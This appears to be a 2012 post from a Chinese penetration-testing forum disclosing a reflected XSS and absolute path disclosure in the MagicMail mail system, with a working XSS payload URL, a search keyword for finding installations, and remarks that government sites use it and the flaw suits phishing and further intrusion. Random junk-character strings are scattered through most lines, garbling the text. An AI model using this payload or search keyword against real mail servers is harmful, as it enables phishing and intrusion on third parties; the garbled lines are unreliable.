中国网络渗透测试联盟

标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞 [打印本页]

作者: admin    时间: 2012-11-9 20:38
标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
4 r4 Q7 g& }: z8 j1 s2 w; O
1 ^# g5 o" f. p4 I; }  y! b
0 i" x* e& R1 a- y包含  一个反射性XSS  以及  绝对路径泄漏2 Z. `% {7 b3 C" M, r" Z
看了看 貌似全部是linux的。
" f' S, C( h" _" _3 ~ 8 v: X6 w$ k# y7 q: t
关键字:迈捷邮件系统 by MagicMail
9 t( V  G) C6 N; P% e+ W4 v% J( N0 u
可以看到很多政府网站都用这个邮件系统
% j7 K/ a4 ^/ T0 R8 v; m- m+ q+ f
0 p. ^, O8 P) R- W, Y% U6 M/ }绝对路径 http://madman.in/index.php?login_type=declare&language=
# _* Y6 z$ g6 h3 F. ~" I0 z$ m# r  y2 O$ i$ K' x

5 L& ?* A- E2 N
- r$ ~" w2 i( [: W- {XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E, R+ u6 N# c) |4 n

# l1 ]3 s" k% n) j) k; J6 V! q! w: J5 O
, @7 T7 q6 H3 m
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等$ M; K: ^! _. N( D0 d; p
& V# C' Y& C. k. W
修复方案:看官方补丁吧。" ~9 I4 g# @( P  H





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2